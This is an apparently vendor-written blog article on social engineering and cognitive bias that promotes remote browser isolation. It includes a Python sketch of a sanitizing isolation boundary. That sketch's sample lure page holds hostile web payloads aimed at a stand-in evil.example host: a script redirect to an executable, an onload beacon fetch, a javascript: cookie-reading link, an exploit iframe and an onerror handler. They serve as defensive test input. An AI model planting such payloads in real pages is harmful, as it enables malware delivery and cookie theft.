It’s no secret that an organization’s own users pose a serious threat to its cybersecurity, even when the organization has invested heavily in technology to prevent breaches. Whether naïve or merely distracted, these users can – and all too often do – compromise the security of the whole organization with a single click.
Of course, the users themselves don’t bear sole responsibility. Attackers use a plethora of techniques, commonly referred to as “social engineering”, to trick or otherwise manipulate people into cooperating with their agenda, taking shrewd advantage of common human behaviors and cognitive biases. A cognitive bias is a systematic deviation from rational judgement, such as the very human tendency to take mental short-cuts when deciding under pressure, or to carry out routine actions out of sheer habit without thinking. Social engineering exploits these tendencies to get people to infect their own devices with malware or to hand over private information – voluntarily.
For an attacker, social engineering is often the method of choice for getting at privileged information. With technical intrusion, the attacker first has to gain a foothold in a protected network and then hunt for the information, which takes time, skill and tooling. By manipulating users into giving up the information of their own accord, the attacker can simply wait for the responses to come in, supplying exactly what is needed to carry out the attack. In fact, according to a recent Data Breach Investigations Report by Verizon, nearly half of all reported security breaches involved social engineering.
Scamming the savvy
You might still be thinking, “Sure, some people might fall for these tricks, but I know a scam when I see one.” Don’t be so sure. Attackers can use social engineering to successfully target even the most tech-savvy executives. Kane Gamble, a British teenager who pleaded guilty in 2017, had broken into the personal email accounts of the US Director of National Intelligence and the Director of the CIA using social engineering alone. Through impersonation, he gathered enough personal information about these officials to convince their service providers to reset passwords, giving him full access to their email accounts.
Email scams these days are more sophisticated than ever. Attackers targeting a particular organization may gather a wide variety of details about their targeted users to make the emails as convincing as possible. They also create a sense of urgency, further clouding judgement. The email may tell a plausible story, such as the organization prompting all users to download a phony “software update” to resolve a security problem, or to urgently review an attachment documenting some other (fake) company-wide concern.
Even users who are specifically trained to recognize phishing or spoofing attempts can make mistakes. While training is an essential and effective technique for reducing security breaches, it relies on one thing – the ability of the user to think slowly and rationally. Even the most careful user can make a careless click when distracted, under pressure, or just plain tired. In these moments the user may overlook the clear signs of phishing or a spoofed sender address because they are thinking fast. As Daniel Kahneman writes in his book “Thinking, Fast and Slow”, even those of us trained in advanced logic can fail to evaluate simple risks and make errors in judgement when thinking fast, leading to bad decisions – like clicking on a malicious link. No amount of training can prevent such a natural human behavior from happening, at least occasionally.
Smart solutions for smart scams
To mitigate the insider threat created by users who fall prey to social engineering, most organizations rely on traditional hardware and software controls such as anti-virus software, firewalls and email gateways to detect and block suspicious traffic and files before they reach the network and its endpoints. Best practice calls for multiple layers of security throughout the organization, so that no single point of failure exposes the network to a broad-scale attack.
However, for advanced threats that evade detection, organizations need to supplement these detect-and-block controls with more proactive defenses, particularly for outward-facing applications such as email clients and web browsers. Remote browser isolation (RBI), for example, proactively shields endpoints even against browser-borne threats that no signature or heuristic has caught, closing off a threat vector that phishers and other cyber criminals rely on heavily.
When using RBI, users browse the web as normal through an interactive content stream. In the background, however, all active code for the browser session executes in a virtual container in the DMZ or in the cloud, and the container is destroyed when the session ends. So if a user hastily clicks on something malicious, the code runs and dies in that disposable container and never executes on the endpoint or inside the organizational network. This protects the organization from the potentially catastrophic result of a simple error in judgement. One caveat a practitioner should keep in mind: isolation controls what a page can execute, not what a user chooses to type. A user who enters a password into a convincing look-alike login page still gives it away, so RBI complements credential protections rather than replacing them.
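To make the boundary that RBI draws concrete, here is an added illustration in Python. It is not Ericom’s code and not how any shipping product is built; the tag allow-list, the helper names and the sample lure page are all constructed for the example. Real RBI products render the page in a full browser inside a disposable container and stream pixels or a reconstructed DOM to the endpoint. This sketch models only the filtering principle: the isolated side parses the untrusted page, executes nothing, and forwards a passive reconstruction, while scripts, frames, plugins, event handlers and script-scheme URLs are stopped at the boundary and logged.

```python
"""Toy model of the isolation boundary described above.

Added illustration, not Ericom's code. The 'isolated side' parses an
untrusted page, executes nothing, and forwards only a passive
reconstruction (text, structure, plain links, image references) to the
endpoint. Active content is stopped at the boundary and recorded.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Passive markup allowed to cross to the endpoint (constructed allow-list).
ALLOWED_TAGS = {"html", "head", "title", "body", "h1", "h2", "h3", "p", "div",
                "span", "a", "img", "b", "i", "strong", "em", "br", "ul", "ol",
                "li", "table", "tr", "td", "th"}
# Elements whose whole subtree, content included, never leaves the isolated side.
DROP_SUBTREE = {"script", "style", "iframe", "object", "embed", "applet",
                "noscript", "template"}
ALLOWED_ATTRS = {"href", "src", "alt", "title"}
VOID_TAGS = {"br", "img"}


def safe_url(value: str) -> bool:
    """Allow only http(s) and relative URLs; javascript:, data:, vbscript: fail closed."""
    scheme = urlsplit(value.strip()).scheme.lower()
    return scheme in ("", "http", "https")


class Reconstructor(HTMLParser):
    """Runs on the isolated side and builds the passive copy sent to the endpoint."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []         # passive markup destined for the endpoint
        self.dropped: list[str] = []     # audit record of what the boundary stopped
        self.drop_stack: list[str] = []  # open tags inside a dropped subtree

    def handle_starttag(self, tag, attrs):
        if self.drop_stack:                      # inside <script>, <iframe>, ...
            if tag not in VOID_TAGS:
                self.drop_stack.append(tag)
            return
        if tag in DROP_SUBTREE:
            self.dropped.append(f"<{tag}>")
            self.drop_stack.append(tag)
            return
        if tag not in ALLOWED_TAGS:              # unknown tag: keep its text, lose the tag
            self.dropped.append(f"<{tag}> (unwrapped)")
            return
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on"):            # onload=, onerror=, onclick=, ...
                self.dropped.append(f"{tag}@{name}")
            elif name in ("href", "src") and not safe_url(value):
                self.dropped.append(f"{tag}@{name}={value!r}")
            elif name in ALLOWED_ATTRS:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if self.drop_stack:
            if tag in self.drop_stack:           # tolerate unclosed tags inside the subtree
                while self.drop_stack.pop() != tag:
                    pass
            return
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_stack:                  # script/style bodies arrive as data; they stay here
            self.out.append(html.escape(data, quote=False))


def reconstruct(untrusted_html: str):
    """Return (passive_html_for_endpoint, audit_list_of_dropped_items)."""
    r = Reconstructor()
    r.feed(untrusted_html)
    r.close()
    return "".join(r.out), r.dropped


# Constructed sample of a "software update" lure page, as in the scenario above.
SAMPLE_PAGE = """<html><head><title>Security Update Required</title>
<script>location='http://evil.example/update.exe'</script></head>
<body onload="fetch('http://evil.example/beacon')">
<h1>Urgent: install the update now</h1>
<p>Your mailbox will be <b>locked</b> in 24 hours.</p>
<a href="javascript:alert(document.cookie)">Click here</a>
<a href="https://update.example.com/patch">Download</a>
<iframe src="http://evil.example/exploit"><p>fallback</p></iframe>
<img src="https://update.example.com/logo.png" alt="logo" onerror="steal()">
</body></html>"""

if __name__ == "__main__":
    passive, dropped = reconstruct(SAMPLE_PAGE)
    print(passive)
    print("stopped at the boundary:", dropped)
```

Running it on the constructed lure shows the point of the architecture: the headline, the warning text and the legitimate download link reach the endpoint, while the script, the iframe and its fallback content, the `onload` and `onerror` handlers and the `javascript:` link are consumed on the isolated side and appear only in the audit list. Note what the model does not do: the text of the lure still arrives, so a user can still be talked into acting on it.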
Nothing will completely eliminate the threat of social engineering, and relying on training and education alone definitely isn’t enough. Attackers are always on the lookout for new ways to con and breach, at both the human and the machine level. New, smart solutions like RBI should be used to provide a preventative layer of protection that allows for human mistakes and cognitive biases without leaving the organization vulnerable to cyberattack.
George has over twenty years of experience in delivering IT and cybersecurity solutions to organizations in the education, government, healthcare and finance sectors. He is currently the Regional Sales Manager for Northern Europe and the UK for Ericom Software, a global leader in securely connecting the digital workplace and protecting organizations from web-borne threats. Twitter: @GHannahEricomUK ; @Ericom_Software LinkedIn: https://www.linkedin.com/in/ghannah/; https://www.linkedin.com/company/ericom-software/